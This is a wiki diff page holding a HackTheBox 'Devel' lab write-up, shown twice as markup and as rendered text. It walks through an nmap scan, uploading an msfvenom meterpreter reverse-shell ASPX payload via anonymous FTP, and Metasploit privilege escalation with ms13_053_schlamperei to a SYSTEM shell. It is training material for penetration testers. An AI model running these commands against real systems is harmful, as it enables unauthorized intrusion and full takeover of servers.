Devel: Difference between revisions

From RCATs
(Created page with "Category:HackTheBox <nowiki>= NMAP =</nowiki> <nowiki><syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org</nowiki> ) at 2022-12-21 21:06 MST Nmap scan report for 10.129.28.254 Host is up (0.064s latency). Not shown: 998 filtered tcp ports (no-response) PORT   STATE SERVICE VERSION 21/tcp open  ftp     Microsoft ftpd | ftp-syst: |_  SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17  01:06AM       <DIR>...")
 
No edit summary
Line 1: Line 1:
[[Category:HackTheBox]]
[[Category:HackTheBox]]
<nowiki>= NMAP =</nowiki>
= NMAP =
 
<nowiki><syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org</nowiki> ) at 2022-12-21 21:06 MST


<syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST
Nmap scan report for 10.129.28.254
Nmap scan report for 10.129.28.254
Host is up (0.064s latency).
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
Not shown: 998 filtered tcp ports (no-response)
 
PORT   STATE SERVICE VERSION
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
 
21/tcp open  ftp     Microsoft ftpd
 
| ftp-syst:
| ftp-syst:
 
|SYST: Windows_NT
|SYST: Windows_NT
 
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
 
| 03-18-17  01:06AM       <DIR>         aspnet_client
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                 689 iisstart.htm
 
| 12-22-22  01:27AM               897112 r.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-22-22  01:17AM                 2921 rev.aspx
 
| 12-22-22  01:06AM                 2935 reverse.aspx
| 12-22-22  01:27AM               897112 r.aspx
|_03-17-17  04:37PM               184946 welcome.png
 
80/tcp open  http   Microsoft IIS httpd 7.5
| 12-22-22  01:17AM                 2921 rev.aspx
 
| 12-22-22  01:06AM                 2935 reverse.aspx
 
|_03-17-17  04:37PM               184946 welcome.png
 
80/tcp open  http    Microsoft IIS httpd 7.5
 
|_http-server-header: Microsoft-IIS/7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| http-methods:
 
|Potentially risky methods: TRACE
|Potentially risky methods: TRACE
 
|_http-title: IIS7
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Service detection performed. Please report any incorrect results at <nowiki>https://nmap.org/submit/</nowiki> .
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds</syntaxhighlight>
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds<nowiki></syntaxhighlight></nowiki>
= USER =


<nowiki>= USER =</nowiki>
Generate payload with <code>msfvenom</code>


Generate payload with <nowiki><code>msfvenom</code></nowiki>
<syntaxhighlight lang="bash">msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx  </syntaxhighlight>
 
Upload to FTP with <code>anonymous</code> login we noticed from nmap
<nowiki><syntaxhighlight lang="bash">msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx  </syntaxhighlight></nowiki>
 
Upload to FTP with <nowiki><code>anonymous</code></nowiki> login we noticed from nmap
 
<nowiki><syntaxhighlight lang="bash">❯ ftp anonymous@10.129.28.254</nowiki>


<syntaxhighlight lang="bash">❯ ftp anonymous@10.129.28.254
Connected to 10.129.28.254.
Connected to 10.129.28.254.
220 Microsoft FTP Service
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
Password:
230 User logged in.
230 User logged in.
Remote system type is Windows_NT.
Remote system type is Windows_NT.
 
ftp> put r.aspx                                                                                                      
ftp> put r.aspx                                                                                                        
200 PORT command successful.
 
200 PORT command successful.  
 
125 Data connection already open; Transfer starting.
125 Data connection already open; Transfer starting.
226 Transfer complete.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
ftp> dir
200 PORT command successful.
200 PORT command successful.
150 Opening ASCII mode data connection.
150 Opening ASCII mode data connection.
 
03-18-17  01:06AM       <DIR>         aspnet_client
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                 689 iisstart.htm
 
12-22-22  01:27AM               897112 r.aspx
03-17-17  04:37PM                  689 iisstart.htm
12-22-22  01:17AM                 2921 rev.aspx
 
12-22-22  01:06AM                 2935 reverse.aspx
12-22-22  01:27AM               897112 r.aspx
03-17-17  04:37PM               184946 welcome.png
 
12-22-22  01:17AM                 2921 rev.aspx
 
12-22-22  01:06AM                 2935 reverse.aspx
 
03-17-17  04:37PM               184946 welcome.png
 
226 Transfer complete.
226 Transfer complete.
ftp> rm rev.aspx
ftp> rm rev.aspx
550 The directory name is invalid.
550 The directory name is invalid.
ftp>  
ftp>  
</syntaxhighlight>
Setup listener within metasploit and visit <code>http://10.129.28.254/r.aspx</code>


<nowiki></syntaxhighlight></nowiki>
<syntaxhighlight lang="bash">msf6 exploit(multi/handler) > set lhost 10.10.16.18
 
Setup listener within metasploit and visit <nowiki><code>http://10.129.28.254/r.aspx</nowiki><nowiki></code></nowiki>
 
<nowiki><syntaxhighlight lang="bash">msf6 exploit(multi/handler) > set lhost 10.10.16.18</nowiki>
 
lhost => 10.10.16.18
lhost => 10.10.16.18
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > show options


Module options (exploit/multi/handler):
Module options (exploit/multi/handler):


  Name  Current Setting  Required  Description
  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------


  ----  ---------------  --------  -----------


Payload options (windows/meterpreter_reverse_tcp):
Payload options (windows/meterpreter_reverse_tcp):


  Name        Current Setting  Required  Description
  Name       Current Setting  Required  Description
 
  ----       --------------- -------- -----------
  ----        ---------------  --------  -----------
  EXITFUNC   process         yes       Exit technique (Accepted: '', seh, thread, process, none)
 
  EXTENSIONS                   no       Comma-separate list of extensions to load
  EXITFUNC    process          yes       Exit technique (Accepted: <nowiki>''</nowiki>, seh, thread, process, none)
  EXTINIT                      no        Initialization strings for extensions
 
  LHOST      10.10.16.18      yes      The listen address (an interface may be specified)
  EXTENSIONS                   no        Comma-separate list of extensions to load
  LPORT      4444            yes      The listen port


  EXTINIT                      no        Initialization strings for extensions
  LHOST       10.10.16.18      yes       The listen address (an interface may be specified)
  LPORT       4444             yes       The listen port


Exploit target:
Exploit target:


  Id  Name
  Id  Name
  --  ----
  0  Wildcard Target


  --  ----


  0   Wildcard Target


View the full module info with the info, or info -d command.
View the full module info with the info, or info -d command.
Line 155: Line 98:


[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700


meterpreter >
meterpreter >
meterpreter > getuid
meterpreter > getuid
 
Server username: IIS APPPOOL\Web</syntaxhighlight>
Server username: IIS APPPOOL\Web<nowiki></syntaxhighlight></nowiki>
= Privlege Escalation =
 
<nowiki>= Privlege Escalation =</nowiki>


Now search exploit suggester.
Now search exploit suggester.


<nowiki><syntaxhighlight lang="bash">msf6 post(multi/recon/local_exploit_suggester) > set session 1                                                                                                                                                                                 </nowiki>
<syntaxhighlight lang="bash">msf6 post(multi/recon/local_exploit_suggester) > set session 1                                                                                                                                                                                
 
session => 1                                                                                                                                                                                                                                  
session => 1                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit 
 
#   Name                                                           Potentially Vulnerable? Check Result                                                                                                                                    
msf6 post(multi/recon/local_exploit_suggester) > exploit   
-   ----                                                           ----------------------- ------------                                                                                                                                    
 
1   exploit/windows/local/bypassuac_eventvwr                       Yes                     The target appears to be vulnerable.                                                                                                            
<nowiki>#</nowiki>   Name                                                           Potentially Vulnerable?  Check Result                                                                                                                                      
2   exploit/windows/local/ms10_015_kitrap0d                       Yes                     The service is running, but could not be validated.                                                                                              
 
3   exploit/windows/local/ms10_092_schelevator                     Yes                     The service is running, but could not be validated.                                                                                              
-   ----                                                           -----------------------  ------------                                                                                                                                      
4   exploit/windows/local/ms13_053_schlamperei                     Yes                     The target appears to be vulnerable.                                                                                                            
 
5   exploit/windows/local/ms13_081_track_popup_menu               Yes                     The target appears to be vulnerable.                                                                                                            
1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                                                                              
6   exploit/windows/local/ms14_058_track_popup_menu               Yes                     The target appears to be vulnerable.                                                                                                            
 
7   exploit/windows/local/ms15_004_tswbproxy                       Yes                     The service is running, but could not be validated.                                                                                              
2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                                                                               
8   exploit/windows/local/ms15_051_client_copy_image               Yes                     The target appears to be vulnerable.                                                                                                            
 
9   exploit/windows/local/ms16_016_webdav                         Yes                     The service is running, but could not be validated.                                                                                              
3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                                                                               
10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                     The service is running, but could not be validated.                                                                                              
 
11  exploit/windows/local/ms16_075_reflection                     Yes                     The target appears to be vulnerable.                                                                                                            
4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                                                                              
12  exploit/windows/local/ntusermndragover                         Yes                     The target appears to be vulnerable.                                                                                                            
 
13  exploit/windows/local/ppr_flatten_rec                         Yes                     The target appears to be vulnerable.</syntaxhighlight>
5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 
6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 
7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.                                                                                               
 
8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                                                                              
 
9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                                                                               
 
10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                                                                                               
 
11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                                                                              
 
12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                                                                              
 
13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.<nowiki></syntaxhighlight></nowiki>
 
Winner winner!
Winner winner!


<nowiki><syntaxhighlight lang="bash">msf6 exploit(windows/local/ms13_053_schlamperei) > exploit</nowiki>
<syntaxhighlight lang="bash">msf6 exploit(windows/local/ms13_053_schlamperei) > exploit


[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Launching notepad to host the exploit...
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to 10.129.28.254
[*] Sending stage (175686 bytes) to 10.129.28.254
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700


meterpreter > getui
meterpreter > getui
[-] Unknown command: getui
[-] Unknown command: getui
meterpreter > getuid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Server username: NT AUTHORITY\SYSTEM
 
</syntaxhighlight>
<nowiki></syntaxhighlight></nowiki>

Revision as of 17:41, 20 January 2023

NMAP

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST
Nmap scan report for 10.129.28.254
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-22-22  01:27AM               897112 r.aspx
| 12-22-22  01:17AM                 2921 rev.aspx
| 12-22-22  01:06AM                 2935 reverse.aspx
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds

USER

Generate payload with msfvenom

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx

Upload to FTP with anonymous login we noticed from nmap

❯ ftp anonymous@10.129.28.254
Connected to 10.129.28.254.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx                                                                                                        
200 PORT command successful.  
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
12-22-22  01:27AM               897112 r.aspx
12-22-22  01:17AM                 2921 rev.aspx
12-22-22  01:06AM                 2935 reverse.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.
ftp>

Setup listener within metasploit and visit http://10.129.28.254/r.aspx

msf6 exploit(multi/handler) > set lhost 10.10.16.18
lhost => 10.10.16.18
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       10.10.16.18      yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700

meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privlege Escalation

Now search exploit suggester.

msf6 post(multi/recon/local_exploit_suggester) > set session 1                                                                                                                                                                                 
session => 1                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit   
 #   Name                                                           Potentially Vulnerable?  Check Result                                                                                                                                      
 -   ----                                                           -----------------------  ------------                                                                                                                                      
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                                                                              
 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                                                                               
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                                                                               
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                                                                              
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.                                                                                               
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                                                                              
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                                                                               
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                                                                                               
 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                                                                              
 12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                                                                              
 13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

Winner winner!

msf6 exploit(windows/local/ms13_053_schlamperei) > exploit

[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to 10.129.28.254
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700

meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM